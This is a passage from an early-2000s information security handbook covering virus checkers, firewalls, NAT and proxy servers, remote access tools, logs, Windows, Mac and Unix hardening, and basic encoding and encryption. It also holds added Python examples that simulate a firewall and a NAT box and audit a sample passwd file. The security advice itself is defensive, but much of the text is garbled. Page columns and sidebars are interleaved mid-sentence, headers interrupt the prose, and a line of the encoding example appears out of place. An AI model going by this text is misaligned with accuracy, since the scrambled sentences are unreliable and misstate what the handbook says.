ART Rule 20: Every computer that is vulnerable to As of the end of August 2003, one of the popular viruses should run anti-virus software and should PC/Macintosh virus programs (Norton AntiVirus") check for up-to-date virus signatures daily. checked for almost 65,000 different viruses. That these TW A full scan of the machine should be performed programs can do this as fast as they do, without per- periodically as well. ceptibly slowing down your computer, is quite amazing. O August 2003 was a particularly interesting month for Rule 21: Computers that are not particularly malware, with the release of several worms (Blaster and subject to viruses such as Unix-based systems SOBIG being the most common ones) that took advan- should nevertheless ensure that the mail that tage of a vulnerability in Windows computers. A month they send out does not contain a virus that may earlier, Microsoft had released a patch for this vulnera- harm the recipient. bility, but relatively few people installed this patch, and so these new worms hit new records for the number of Rule 22: Keep your operating system and key machines infected and the speed at which they spread. application software up-to-date and remember They may have also set new records for the number of that virus checkers only check for infestations "copy-cats" ­ the same basic worm, but with various in files. Vulnerabilities in operating systems and modifications. On the busiest day, Norton added fifty- applications programs can leave you open to attack one new virus signatures (defining characteristics of in other ways. those viruses) to their list. For the whole month, 520 new signatures were added. Virus checking software attempts to keep your computer free of viruses, worms, and Trojans in a number of ways: Firewalls · Whenever you access, copy, save, move, open, A firewall watches all network activity going into or or close a file, the virus checker makes sure that coming out of your computer. 
Based on a set of rules, it it is not infected with any known virus (and other can allow the traffic to pass or it can block it. A firewall similar pests). can be either a program running on your computer or a · Whenever you insert a foreign disk in your machine, separate piece of equipment between your computer (or it is checked for certain types of viruses. a cluster of computers) and its network connection. · Whenever a mail file is received, it (and attachments) Sometimes firewalls are included in other equipment is scanned for malware. such as routers. There are free or pre-installed firewalls · Whenever a file is downloaded from the web, available for many operating systems. it is scanned. · In many cases, when a web page with embedded Rule 23: All computers should be protected by a software is downloaded, it is scanned. firewall of some sort, either software within the · You can explicitly request that any file, set of files, computer, or an external firewall protecting that or entire disks be checked for viruses. computer or an entire local network of computers. 64 INFORMATION SECURITY AND GOVERNMENT POLICIES To fully understand what a firewall does, and how though they will all be ignored, they can keep your to set up the rules that govern it, you need an network connection so busy that you cannot do any introductory understanding of TCP/IP ­ the protocol real work (only hardware firewalls will help you in (set of rules) governing all messages sent over the this case). Internet. If you are already familiar with the TCP/IP · If, despite your best efforts, you do end up with protocol, you should go directly to the next section. a virus, worm or Trojan on your computer, it can If you are not already familiar with TCP/IP, you should send anything on your computer to the malware first read Addendum 2. TCP/IP. Note that a firewall creator. 
This could include any of your data or logs can be used even if you do not want to learn these of what you are typing (including passwords). technical details. In that case, here is all you need to know about TCP/IP: How do firewalls work? · Machines on the Internet all have an " IP address" A firewall watches every packet that is received by to that has the form 12.222.103.43, that is, four sent from your computer, and verifies whether it vio- numbers separated by periods. The Internet uses your lates any of the rules that you have set for it. If a address to route messages to you, and your computer packet violates the rules, it is blocked (discarded). For says where to send out-going messages by providing both software firewalls and external (hardware) fire- the address of the destination. walls, the rules might include: · Within each machine, different programs are identified by the "port" number (sort of like a · Do not allow any packets to TCP/UDP ports 135, 137, telephone extension number within a large company ­ 139, 445. These ports are used for Windows file there is just one telephone number, but each person sharing and a selection of other Windows services. has their own extension number). By discarding these packets, you are ensuring that · Information sent to or from your computer is no one on the Internet can contact your computer enclosed in "envelopes" call packets. for these services. · Ignore the words TCP and UDP in the following · Do not allow any packets to TCP/UDP ports 135, 137, discussion. 139, 445 unless they come from IP address 192.168.1.150 (where 192.168.1.150 is that address Why do we need firewalls? of your second computer that is allowed to share your resources). If your computer is not connected to a local network or · You can give the firewall a list of trusted computers ­ to the Internet, you do not need a firewall. Once you those that you know are not trying to hurt you. use the network, you are subject to all sorts of abuse. 
Only trusted computers will be able to initiate For example: communications with you. You can still communica- tion with other computers, such as web servers · If you use file sharing, print-sharing or any other on the Internet, but you must initiate the inter-computer services, your computer is probably communication. listening on certain ports. Although you may be doing this so that the computer in the next room Software firewalls consume resources on your computer, can share your resources, it is possible that a but have the added advantage that they not only look computer anywhere else in the world could as well. at the datagram (with its to/from address and ports), but · If you are listening on a port for (for instance) they can check which program is sending the message. If file sharing, it is possible that due to bugs in the it sees a program initiating a communication that you had program, someone could send you a message that not explicitly allowed, the firewall can ask you for your would take some other action ­ perhaps malicious. permission before allowing it to go through. A hardware Unfortunately, such bugs are quite common. firewall cannot determine which program is bring used, · Even if you are not listening on any port, computers but since it is a separate piece of equipment, it does not elsewhere can send you floods of messages. Even slow your computer down at all. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 65 Like all security-related precautions, if you have a firewall, whether hardware or software, you must keep the software Proxy servers A proxy server is a specific type of and firmware up to date. Attackers are very innovative firewall. The proxy server has an and it is essential that the tools that you are using to address in the private address space, protect your system and data are current. but also has a second connection and address connected to the Private Address Spaces and Network Address Internet. 
If a user wants to Translation (NAT) (and is allowed to) communicate with a machine in the Internet, As the Internet was originally designed, every computer it sends the message to the proxy or device on the Internet had its own address, so there server, and requests that this P was the ubiquitous ability of every computer to talk message be forwarded to the target ART to every other computer. Today, there are cases where machine in the Internet. The proxy universal connectivity is no longer appropriate. There server keeps track of this request, are two primary reasons: and when the answer comes back, it returns the answer to the TW · You want to isolate a set of computers so that they originating machine. cannot directly talk to the rest of the Internet ­ O and the Internet cannot talk directly to them. Proxy servers can also be used if you This is the case with computers within some have a normal IP address. They are organizations, both public and private. used to control what type of traffic · Because of the way that IP addresses are allocated goes out onto the Internet, or to within the Internet, your organization does not have simplify a user's interaction with the enough IP addresses to assign unique addresses to network. A web proxy server will every machine. This is often the case with developing keep copies of pages requested, and countries where national Internets were built (or are if a second user requests the same being built) several years after comparable networks page, it simply provides the copy ­ in developed countries. limiting the number of requests sent to the Internet and therefore There are certain IP addresses that are not usable over reducing external bandwidth the Internet. These are called Private Address Spaces and requirements. Keeping recently can be used in the above two cases. Since these com- requested pages is called caching. puters will not directly interact with the rest of the Internet, they do not need unique addresses. 
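The rule types listed under "How do firewalls work?" above (closing the Windows sharing ports 135, 137, 139 and 445, exempting the second computer at 192.168.1.150, and letting only trusted computers or replies to connections you initiated through) can be expressed as a small packet filter. This is an added example, not code from the Handbook; the protected computer's address 192.168.1.10 and the Internet hosts in the constructed packet sequence are assumptions.

```python
"""Toy stateful packet filter for the rule types described under
"How do firewalls work?".  Added example, not from the Handbook."""
from dataclasses import dataclass

# Ports the text names for Windows file sharing and related services.
WINDOWS_SHARING_PORTS = {135, 137, 139, 445}
# The second computer that is allowed to share resources (from the text).
SECOND_COMPUTER = "192.168.1.150"
# Constructed: the address of the computer this firewall protects.
MY_ADDRESS = "192.168.1.10"


@dataclass(frozen=True)
class Packet:
    """The parts of a packet's 'envelope' that the rules look at."""
    src: str            # source IP address
    sport: int          # source port
    dst: str            # destination IP address
    dport: int          # destination port
    proto: str = "TCP"  # the text says TCP vs UDP can be ignored here


class Firewall:
    """Applies the three rule types from the text, in this order:
    1. the Windows sharing ports are closed to everyone but the second computer,
    2. trusted computers may initiate communication with us,
    3. any other inbound packet must be a reply to something we sent."""

    def __init__(self, my_address, trusted, blocked_ports):
        self.me = my_address
        self.trusted = set(trusted)
        self.blocked_ports = set(blocked_ports)
        # Connections this computer initiated: (remote addr, remote port, our port).
        self.initiated = set()
        self.log = []

    def _decide(self, pkt):
        if pkt.src == self.me:
            # Outbound traffic is allowed; remember it so the reply can come back.
            self.initiated.add((pkt.dst, pkt.dport, pkt.sport))
            return True, "outbound"
        if pkt.dst != self.me:
            return False, "not addressed to this computer"
        if pkt.dport in self.blocked_ports and pkt.src not in self.trusted:
            return False, f"sharing port {pkt.dport} closed to untrusted hosts"
        if pkt.src in self.trusted:
            return True, "trusted computer"
        if (pkt.src, pkt.sport, pkt.dport) in self.initiated:
            return True, "reply to a connection we initiated"
        return False, "unsolicited inbound"

    def filter(self, pkt):
        """Return True if the packet passes; every decision is logged."""
        allowed, reason = self._decide(pkt)
        verdict = "ALLOW" if allowed else "BLOCK"
        self.log.append(
            f"{verdict} {pkt.proto} {pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} ({reason})")
        return allowed


def run_demo():
    """Feed a constructed packet sequence through the firewall; returns (verdicts, log)."""
    fw = Firewall(MY_ADDRESS, trusted={SECOND_COMPUTER}, blocked_ports=WINDOWS_SHARING_PORTS)
    packets = [
        Packet("203.0.113.7", 40000, MY_ADDRESS, 445),     # Internet host probing file sharing
        Packet(SECOND_COMPUTER, 40001, MY_ADDRESS, 139),   # our second computer sharing files
        Packet(MY_ADDRESS, 51000, "198.51.100.20", 80),    # we request a web page
        Packet("198.51.100.20", 80, MY_ADDRESS, 51000),    # the web server's reply
        Packet("198.51.100.20", 80, MY_ADDRESS, 51001),    # same server, a port we never used
        Packet("203.0.113.7", 40002, MY_ADDRESS, 8080),    # untrusted host, non-sharing port
    ]
    verdicts = [fw.filter(p) for p in packets]
    return verdicts, fw.log


if __name__ == "__main__":
    for line in run_demo()[1]:
        print(line)
```

The log lines the filter produces are the kind of entries the "Logs" section later recommends keeping.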
Although several organizations may be using this same set of addresses, neither of them can see the other and there is no problem. In the first case in the bullet points above, even though you do not want to allow most contacts between the internal machines and the Internet, there will be some interactions that are desirable and necessary. In the second case, there is no prohibition on such access.

There are two mechanisms that allow a computer with a private address to communicate over the Internet.

Network Address Translation

Network Address Translation (NAT) is normally implemented by having a special box sit between the local network and the Internet. Like the proxy server, it is connected to both the local network where private IP addresses are used, and to the Internet. When a message from the local network bound for the Internet is received by the NAT box, the NAT box sends the message out to the Internet using its IP address, and says it is coming from a port number that is unused. When the reply comes in, it is returned to the originating computer on the local network. A NAT box is similar to a proxy server, but it works for all kinds of traffic, not only a specific kind (such as web traffic) and it does not do any caching.

Both proxy servers and NAT boxes are effectively firewalls and implicitly protect the machines within the local private address spaces from many of the types of attacks that machines with normal IP addresses are subject to.

Remote access/management/administration tools

Remote access, remote management and remote administration tools allow you to control your computer remotely, either via a dial-up telephone line or via the Internet. When you are connected to your computer in this way, it is equivalent to sitting at the keyboard.

Rule 24: If you use remote access facilities to remotely control any computers, make sure that they have robust security (at the very least, excellent usernames and passwords) to ensure that attackers do not use these same tools.

Remote access tools have many important uses. Among them are:

· They allow you to use your office computer while not at the office. This allows you to use data, applications programs, and network services that are accessible at work.
· They allow you to turn over control of your machine to a specialist to diagnose or fix a problem without the specialist having to come to your location.
· They allow multiple people to use an application program that is only installed on one machine.
· They allow systems support personnel to manage multiple servers easily.

Remote access tools also allow an attacker to do all of the same things. In fact, there is often little functional difference between a remote access tool that is sold for the above type of applications (such as pcAnywhere), and a backdoor Trojan (such as NetBus or Back Orifice).

Malware detectors

It would be nice to assume that if you keep all of your software up-to-date, check incoming files for viruses and worms, use secure usernames and passwords, and protect yourself with a robust firewall, then you will be completely safe. To phrase this as a question, if you practice safe computing, will you be safe?

The answer is "probably". There is always the chance that some sort of problem will hit you before a solution is generally available. It is also possible that occasionally you may do something that is less than 100% safe.

Malware detectors are programs that check your computer to see if there is anything there that looks suspicious, regardless of how it got there. Their functions overlap with virus checkers in some cases, as they will both detect the presence of some types of malware on your disk. Depending on the specific tool, they will check to verify that key system programs have not been surreptitiously changed.

Malware detectors will also look at browser plug-ins and add-ons and try to detect those that are potentially malicious or will violate your privacy. Some malware detectors also include tools to remove an offending program.

Logs

Logs are an under-utilized and under-appreciated tool in ensuring that your computer is secure. A log is a file on disk into which programs can write messages. Typically a message is written into a log when something interesting happens or if some error occurs.

Rule 25: System functions and applications logs should be judiciously enabled.

Examples of "interesting" things include:

· the computer is powered on;
· someone logged onto the computer;
· someone tried to log onto the computer, but had a wrong password;
· an e-mail was received;
· an attempt was made to send an e-mail, but the connection failed;
· there were many errors on a disk, or on a network connection;
· the firewall detected an illegal communication and blocked it;
· the virus checker automatically downloaded a new set of virus signatures;
· a virus scan of all files on your system was run and a virus was detected.

Depending on the program/system, log files can just grow until they are erased, or there may be a new log file created every so often, with the old log files being kept for later review (typically they will have a date in the filename). In general, there is a separate log file for each application or system function. Sometimes you read a log with any text editor, and sometimes the application or system provides specialized tools to read and format logs.

Logs are very useful and should generally be enabled. However, you need to take care to ensure that you do not enable logging for functions that happen too often, or your system will spend all of its time writing logs and your disk will become clogged with log files.
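The NAT box described under "Network Address Translation" above (rewrite an outbound message so it comes from the box's own address on an unused port, remember the mapping, hand the reply back to the originating local machine, and drop anything that is not such a reply, which is what makes a NAT box an implicit firewall) can be simulated as follows. This is an added example, not code from the Handbook; the private hosts, the box's public address 203.0.113.5 and the web server address are constructed.

```python
"""Toy NAT box for the mechanism described under "Network Address Translation".
Added example, not from the Handbook; all addresses are constructed."""
from dataclasses import dataclass, replace

NAT_PUBLIC_ADDRESS = "203.0.113.5"   # constructed: the box's address on the Internet side


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    payload: str = ""


class NatBox:
    """Sits between the private network and the Internet.

    Outbound: rewrite the source to (public address, unused port) and record the
    mapping.  Inbound: only a reply that matches a recorded mapping is translated
    back to the originating private machine; everything else is dropped."""

    def __init__(self, public_address, first_port=40000):
        self.public = public_address
        self.next_port = first_port
        self.by_flow = {}   # (private src, private sport, dst, dport) -> public port
        self.by_port = {}   # public port -> that flow tuple

    def to_internet(self, pkt):
        flow = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        port = self.by_flow.get(flow)
        if port is None:
            port = self.next_port          # an unused port on the public side
            self.next_port += 1
            self.by_flow[flow] = port
            self.by_port[port] = flow
        return replace(pkt, src=self.public, sport=port)

    def from_internet(self, pkt):
        flow = self.by_port.get(pkt.dport)
        if flow is None:
            return None                    # nobody inside asked for this: dropped
        priv_src, priv_sport, dst, dport = flow
        if (pkt.src, pkt.sport) != (dst, dport):
            return None                    # not from the host and port that was contacted
        return replace(pkt, dst=priv_src, dport=priv_sport)


def run_demo():
    """Two private machines fetch pages through the box; an outsider probes it."""
    nat = NatBox(NAT_PUBLIC_ADDRESS)
    server = "198.51.100.20"   # constructed web server on the Internet
    # Both private machines happen to use the same source port; NAT keeps them apart.
    out_a = nat.to_internet(Packet("192.168.1.20", 50000, server, 80, "GET /a"))
    out_b = nat.to_internet(Packet("192.168.1.21", 50000, server, 80, "GET /b"))
    # The server answers the public address and port it saw; each reply is mapped home.
    back_a = nat.from_internet(Packet(server, 80, NAT_PUBLIC_ADDRESS, out_a.sport, "page a"))
    back_b = nat.from_internet(Packet(server, 80, NAT_PUBLIC_ADDRESS, out_b.sport, "page b"))
    # An Internet host trying to reach the private network directly gets nothing.
    probe = nat.from_internet(Packet("203.0.113.99", 1234, NAT_PUBLIC_ADDRESS, 445))
    return out_a, out_b, back_a, back_b, probe
```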
If you understand what the detailed log entries are saying, you should review them periodically to see if anything unusual is happening. Otherwise, logs should be kept so that in the case of some sort of unusual happening, they may give some hint as to exactly what happened.

CHAPTER 8. PLATFORM SPECIFIC ISSUES

Microsoft Windows-based PCs

Strengths and vulnerabilities

The Windows operating system for the Intel x86 (or equivalent) processor is by far the most popular computer system ever built. The capabilities of the operating system and related applications, from an end-user's perspective, are remarkable. There is a vast amount of commercial, shareware, and free software available for it. Although experts are hard to find (as with most systems), there are many people who have reasonable levels of knowledge about these systems. There are many competitors on the hardware side, resulting in much variety and relatively low prices.

From a security point of view, Windows is not quite as attractive. The core operating system was not originally written with either network connectivity or security in mind. The more recent versions (Windows 2000, Windows XP, and later) have addressed many of the original concerns, but security is still lacking and the current changes are of little help to users who are still running older systems. Until recently, Microsoft did not have a strong focus on security, although that is changing, particularly with the media attention on bugs and other exploitable flaws in Microsoft operating systems.

The built-in functionality of their systems and applications has often been enhanced at the expense of security. In many cases, to make things easy for the novice user, systems are delivered with many sub-systems and capabilities enabled, which makes them available for exploitation. Due to the prevalence of these exposures and the number of installed computers, the Windows-based PC has become a major target of malicious programmers who have churned out viruses, worms, and Trojans by the tens of thousands. The Windows GUI (graphical user interface) is sufficiently user-friendly that the system is now used by millions of people with little technical knowledge or interest. This type of user base, coupled with the vulnerabilities cited above, has made Windows-based systems prone to security problems.

How to protect yourself

Virtually all of the rules in this manual apply to Windows systems and security-conscious users should consider each of the recommendations seriously.

Software currency: If you have adequate bandwidth, use Microsoft's Windows Update site to keep your operating system up-to-date. If reasonable bandwidth is not available, consider using Windows Update for critical security patches (they use far less bandwidth than the larger Service Packs). If Windows Update is not practical, updates can be downloaded from Microsoft's Download Center (http://www.microsoft.com/downloads). Perhaps your ISP or some other service provider could download them and distribute them locally on CD. Although it takes significant resources, a Windows Update-like service called Software Update Services can be run on a local site for Windows 2000 systems (http://www.microsoft.com/windows2000/windowsupdate/sus/).

Accounts: For Windows NT, 2000, and XP, which support multiple users, you should ensure that there are no unnecessary user accounts set up. In addition, make sure that all users choose robust passwords, as described earlier in Part 2 of this Handbook. Users should only be given the privileges that they require. For example, even if a machine is administered by its primary user, the user's basic operational account should not have administrator privileges.

File Sharing: If you do not use file sharing or print serving, make sure that the capability is completely disabled. The procedure can be found in Windows Help or within the Microsoft support site; search for "disable file sharing XX" where XX is the version of your system, such as XP or 2000. If you do allow file sharing, make sure you give out no more privileges than necessary.

File System: The FAT and FAT32 file systems historically used by Windows cannot be properly secured, particularly if you are using file sharing. The NTFS file system should be used whenever possible, if there is any network file access. Note that NTFS cannot be used in some cases where you have a dual-boot machine or need to access the hard disk from another operating system.

Systems Services: Some systems come with all services enabled in order to allow sophisticated computer-to-computer communications. If you are not in a corporate network, disable the services that you do not need.

Firewalls: Install a software or hardware firewall. Free software versions are available. Keep the firewall up-to-date. Make sure that the firewall is configured to warn you if unusual activities are taking place.

Anti-virus software: Install anti-virus software. If you cannot find freeware that is kept current, you should invest in commercial software. Some virus software companies offer dynamically downloaded free virus checking. Keep the virus signatures up-to-date; some vendors offer daily updates, others provide weekly updates, or longer term. The more current your virus definitions are, the better your system is protected.

Malware detectors: There are programs which will scan your system for all sorts of potentially malicious software. Pest Patrol (http://www.pestpatrol.com), Lavasoft (http://www.lavasoftusa.com/software/adawareplus/) and SpybotSD (http://www.safer-networking.org) all have free programs that detect various malware.

Security Review: If you are a non-technical user with no support organization available to help you, take a look at Microsoft's recommendations for home users: http://www.microsoft.com/security/home or http://www.microsoft.com/protect/. If you are an IT professional, go to: http://www.microsoft.com/technet/security. If you have a newer system, consider running the Microsoft Baseline Security Analyzer (MBSA) that covers Windows 2000 and XP systems.

Macintosh

Strengths and vulnerabilities

Historically, the Apple Macintosh computer and operating system has been far less prone to security problems than the Windows PC. Moreover, since there are far fewer Mac users than there are PC users, malicious attackers have not been as interested in targeting them. Perhaps the largest vulnerability is that, for these reasons, Mac users often think they are safe and do not bother to take precautions. MacOS systems prior to MacOS X used a proprietary operating system. MacOS X is based on the FreeBSD Unix system, and should be considered a specialized Unix system with regard to security (see next section on Unix). For MacOS X, there are many system services bundled within the core system, but they are all shipped disabled.

How to protect yourself

Software currency: Make sure that your system is fully patched. Go to: http://www.apple.com and click on support. As with Windows systems, there is a good chance that an unpatched system will be infiltrated within hours or days, particularly if it is permanently attached to a network.

Accounts: Make sure that all accounts that you do not need are disabled or deleted. In particular, make sure there are no Guest accounts without a password. Limit administrative privileges to accounts that actively need them and do not use an administrative-capable account for your routine work.

File Sharing: Disable file sharing if you are not using it. If you are using file sharing, make sure the privileges are granted at the minimum level required.

Services: Do not enable services that you do not need. If you enable them temporarily, but will not use them often, disable them when you are through.

New applications: If you install new network-oriented applications, particularly those originally designed for Unix, be aware that they may be vulnerable in ways that were uncommon in systems built prior to MacOS X.

Firewalls: Install a software or hardware firewall. Keep it up-to-date. Make sure that the firewall is set to warn you if unusual activities take place.

Anti-virus software: Install anti-virus software. If you cannot find freeware that is kept current, you should invest in commercial software. Keep the virus signatures up-to-date. The more current your virus definitions are, the better your system is protected.

Unix, Linux, and Related Systems

Strengths and vulnerabilities

Unix systems have historically been used as servers (both for system services and for multi-user computing) and as workstations in computer science and physical science environments. Over the last decade, they have made some modest inroads against Windows and Macintosh systems as single-user workstations in other environments. With the recent popularity of Linux, this phenomenon has spread, partly because the system is so attractive and partly because Linux is viewed as a (free) replacement for Windows. This latter trend is probably stronger in the developing world than it is in developed countries, due to the higher relative cost of software compared to salaries in developing countries. Traditionally, Unix's strengths have been its flexibility coupled with the impressive base of user and corporate-developed software that has grown over the years.

Unfortunately, Unix's flexibility and power have not been accompanied by a user-friendly front-end (from a novice user's point of view). As a result, when these systems have been used as workstations for those who do not wish to become Unix experts, strong systems support staff were needed. To some extent, this is being addressed, with MacOS X being the best example. However, the foundation of the system is still complex, and there are many opportunities for a naive user to leave doors open for security breaches. Although Unix systems have been relatively virus free, they have the distinction of hosting some of the earliest worms and Trojans; these are still major potential problems.

How to protect yourself

The following comments augment information supplied in the rest of this Handbook. Virtually all of the items in the preceding seven chapters apply to Unix, Linux and related systems, and must be addressed if your computer is to be moderately secure. This section focuses primarily on single-user workstations. Those responsible for servers should read Part 5 of this Handbook.

Multiple Unix Variants: Because there have been a variety of versions of Unix-like operating systems, many pre-installed security mechanisms are vendor-specific. It's particularly important to read all of the manuals for your vendor's version of Unix. Several good books, web sites, and mailing lists devoted to Unix security are listed in Annexes 2-5.

Software currency: It is imperative that software be kept current, and that all security patches be applied quickly. Details on where to get updates and how to apply them vary from system to system.

User Privileges: The user root (uid 0) is the superuser and usually has the ability to modify every aspect of the system. Accordingly, protecting the root account and processes that run with root privileges is a critical aspect of Unix security. Avoid using the root account for routine activities, and disable logins by root. When you must use root, use the superuser command (su, or a variation like sudo) to change from your normal user account to root.

If you have multiple users on your system, consider using access control lists or other mechanisms to limit the file access that these users have.

When possible, run network services as a non-root user.

Never unpack or compile new software as root. It's often possible to compile software in a chroot environment to protect yourself against some kinds of Trojan horses.

System Services: Many Unix systems are shipped with a large variety of system services including FTP servers, web servers, and mail servers. In many cases, these systems are active and operating by default. All network-based services that you are not using should be disabled. Some people feel that since the service is there, it should be used, even though they do not have the technical expertise to manage it securely. This is a big mistake and such services should not be run on user workstations without good reason and adequate support.

Many network services are started by the inetd (or xinetd) daemon. Examine the configuration file(s) used by this daemon and disable any services that you do not need. Other network services are started at system boot by files in the /etc/init.d or /etc/rc*.d directories or in the files /etc/rc and /etc/rc.local. Disable any services that you do not use. Pay particular attention to services that may provide outsiders with information about your system or its users, such as fingerd.

If you run anonymous FTP services, use an up-to-date version of the FTP daemon. Don't provide your real /etc/passwd file in the FTP area.
Make sure that /etc/ftpusers, the list Remote disk If you use some mechanism to allow of users who cannot connect by FTP, mounts remote access to your disks (whether includes at least root, uucp, bin, to other Unix systems or to PCs) use and any other account that does not robust passwords and, when possible, belong to a human being. Be wary limit access to the files that the of directory permissions and applications demand. ownership in the FTP area; configure "incoming" directories to prevent downloads and "outgoing" directories to prevent uploads. Scan your FTP logs regularly. 72 INFORMATION SECURITY AND GOVERNMENT POLICIES Firewall Every Unix system should run its own host-based packet-filtering firewall. Consult vendor documentation to determine if your system has a firewall and how to use it. Typical firewall configuration tools include ipfw, ipchains, and iptables. These firewalls should be configured to block all packets by default, and to allow only packets destined for services that you intend to provide. Default Many Unix systems come with several Accounts default accounts that are used to separate process or file ownership privileges, such as daemon, bin, uucp, etc. Make sure that the encrypted password entry for all of these accounts begins with a "*" character so that no possible password can be used to access the account. Only the root account should have a valid password. No one can log into the other accounts (although root can still assume their privileges with the su command if necessary). Malware There are a number of tools which help a detectors Unix administrator ensure that there is no malicious software on their system. One of the oldest is Tripwire, which verifies that the critical system utilities (and other files) have not been surreptitiously altered. Information Technology Security Handbook SECURITY FOR INDIVIDUALS 73 ADDENDUM 1. We can now sent the string: INTRODUCTION TO ENCODING AND 19050321180920252709192709131615182001142028. 
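The Default Accounts and FTP rules above, turned into a check, as an added example that is not the Handbook's own code: it audits a constructed passwd-format file and a constructed /etc/ftpusers for non-root system accounts whose password field does not begin with "*", and for non-human accounts (root, uucp, bin, ...) missing from /etc/ftpusers. It assumes the password field sits in the second column as the text describes (modern systems keep the hash in /etc/shadow, in the same position) and treats uids below 1000 as non-human accounts; both assumptions are marked in the code.

```python
"""Audit the account rules from the Unix checklist (added example, not from the Handbook)."""

SYSTEM_UID_LIMIT = 1000  # assumption: uids below this (other than root) are not people

# Constructed sample files, not taken from any real system. The hash strings are made up.
SAMPLE_PASSWD = """\
root:$1$xyz$hashhashhash:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/sbin/nologin
bin:*:2:2:bin:/bin:/sbin/nologin
uucp:$1$abc$hashhashhash:10:14:uucp:/var/spool/uucp:/bin/sh
ftp::14:50:FTP User:/var/ftp:/sbin/nologin
alice:$1$def$hashhashhash:1001:1001:Alice:/home/alice:/bin/sh
"""

SAMPLE_FTPUSERS = """\
# users that may not connect by FTP
root
bin
"""


def parse_passwd(text):
    """Return (name, password_field, uid) tuples from passwd-format text."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 7:
            continue  # malformed line, skipped
        entries.append((fields[0], fields[1], int(fields[2])))
    return entries


def parse_ftpusers(text):
    """Names listed in /etc/ftpusers, ignoring blank and comment lines."""
    return {line.strip() for line in text.splitlines()
            if line.strip() and not line.startswith("#")}


def is_system_account(name, uid):
    return name != "root" and uid < SYSTEM_UID_LIMIT


def audit_passwords(entries):
    """Flag every non-root system account whose password field does not start with '*'.

    The Handbook's rule: only root should hold a valid password. A field that
    begins with '*' can never match any password; an empty field is worse
    still, because it means no password at all.
    """
    findings = []
    for name, pw, uid in entries:
        if is_system_account(name, uid) and not pw.startswith("*"):
            reason = "empty password field" if pw == "" else "usable password hash"
            findings.append((name, reason))
    return findings


def audit_ftpusers(entries, denied):
    """Return the non-human accounts (plus root) that /etc/ftpusers fails to list."""
    required = {"root"} | {name for name, _, uid in entries if is_system_account(name, uid)}
    return sorted(required - denied)


def run_audit(passwd_text=SAMPLE_PASSWD, ftpusers_text=SAMPLE_FTPUSERS):
    entries = parse_passwd(passwd_text)
    return {
        "bad_password_fields": audit_passwords(entries),
        "missing_from_ftpusers": audit_ftpusers(entries, parse_ftpusers(ftpusers_text)),
    }


if __name__ == "__main__":
    for key, value in run_audit().items():
        print(key, value)
```

On the constructed files, uucp is flagged for a usable hash, ftp for an empty field, and daemon, ftp and uucp are reported as missing from /etc/ftpusers.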
ADDENDUM 1. INTRODUCTION TO ENCODING AND ENCRYPTION

Encoding and Encryption are techniques that transform a string of characters into some other form for a specific reason. In the sense that they are used in computing, encoding is a transformation that alters the look of the object, so that the result meets some specific criteria. Encryption is a transformation designed to disguise or hide the original contents.

Encoding

Encoding changes the format of an object to meet some criteria. It is a reversible process, so that the encoded format can later be decoded to recover the original object.

The Encoding Process

Let us say that you want to send a message consisting of a normal English language sentence:

SECURITY IS IMPORTANT.

However, there is a restriction that you may only send the decimal digits: 0, 1, 2, 3, 4, 5, 6, 7, 8 and 9. To do this, we use a simple set of rules:

Instead of A, send the digits 01;
Instead of B, send the digits 02;
Instead of C, send the digits 03;
Instead of D, send the digits 04;
Instead of E, send the digits 05;
......
Instead of X, send the digits 24;
Instead of Y, send the digits 25;
Instead of Z, send the digits 26;
Instead of the space character, send the digits 27;
Instead of the period character, send the digits 28.

We take the original sentence, and replace each character with its code:

19 replaces the S
05 replaces the E
03 replaces the C
and so forth

We can now send the string: 19050321180920252709192709131615182001142028.

If we put some spaces in the previous line so it is more legible, it looks like this: 19 05 03 21 18 09 20 25 27 09 19 27 09 13 16 15 18 20 01 14 20 28.

When the message is received, the recipient does a reverse translation:

S replaces the 19
E replaces the 05
C replaces the 03
and so forth, resulting in the original sentence.

Encoding Applications

The main application of encoding that we will consider is the transmission of e-mail attachments. E-mail was originally designed for sending English-language text. It was based on the ASCII character set which allows 128 unique characters. 128 is sufficient for representing the 26 letters of the English alphabet in upper and lower case, the 10 digits, a number of special characters (such as comma, period, brackets, etc.) and a variety of control characters (such as tab and end-of-line). Unfortunately, many languages include more characters than English. Programs, word processing files, pictures, and many other types of files are composed of 8-bit bytes which allow 256 unique characters. None of these could be sent in e-mail.

To overcome this problem, the concept of attachments was developed, in which the file to be transmitted would first be encoded so that it would only contain the legal ASCII characters. This process is similar to how our sample sentence was encoded using only digits. As with our sample, the resultant encoded message is longer than the original, but it can be transmitted legally, and, when received, decoded into its original form.

Unicode

Unicode is a method of encoding all characters used in all commonly used languages so that computers may uniformly handle them. Details are available through the Unicode Consortium (http://www.unicode.org), in brief:

"Fundamentally, computers just deal with numbers. They store letters and other characters by assigning a number for each one. Before Unicode was invented, there were hundreds of different encoding systems for assigning these numbers. No single encoding could contain enough characters, for example, the European Union alone requires several different encodings to cover all its languages. Even for a single language like English, no single encoding was adequate for all the letters, punctuation, and technical symbols in common use.

These encoding systems also conflict with one another. That is, two encodings can use the same number for two different characters, or use different numbers for the same character. Any given computer (especially a server) needs to support many different encodings, yet whenever data is passed between different encodings or platforms, that data always runs the risk of corruption. Unicode is changing all that!

Unicode provides a unique number for every character, no matter what the platform, no matter what the program, no matter what the language. The Unicode Standard has been adopted by such industry leaders as Apple, HP, IBM, JustSystem, Microsoft, Oracle, SAP, Sun, Sybase, Unisys and many others."

Encryption

Encryption is similar to encoding in that the process transforms some original text or object into another form. In this case, the intent is to hide the original contents.

There are three types of encryption that we will be looking at:
· Symmetric Encryption
· Public-key Encryption
· One-way Hash Encryption

Symmetric Encryption

In its simplest form, symmetric encryption is similar to encoding. The characters in the original object are transformed. A very simple-minded encryption algorithm (rules governing the process) is to take each alphabetic character and replace it with 1 character higher. So:

A is replaced by B
B is replaced by C
C is replaced by D
......
X is replaced by Y
Y is replaced by Z
Z is replaced by A (at the end of the alphabet, it loops back to the beginning)

If we use this algorithm, our sample sentence becomes (ignoring the space and period in this simple case): TFDVSJUZ JT JNQPSUBOU

The message is now disguised. The recipient will do the reverse translation, changing each letter by using the previous letter, and will obtain the original sentence.

Instead of shifting each character 1 place, we could have shifted them some other number of characters. As long as the recipient knows the number of shifts, they can decrypt the message.

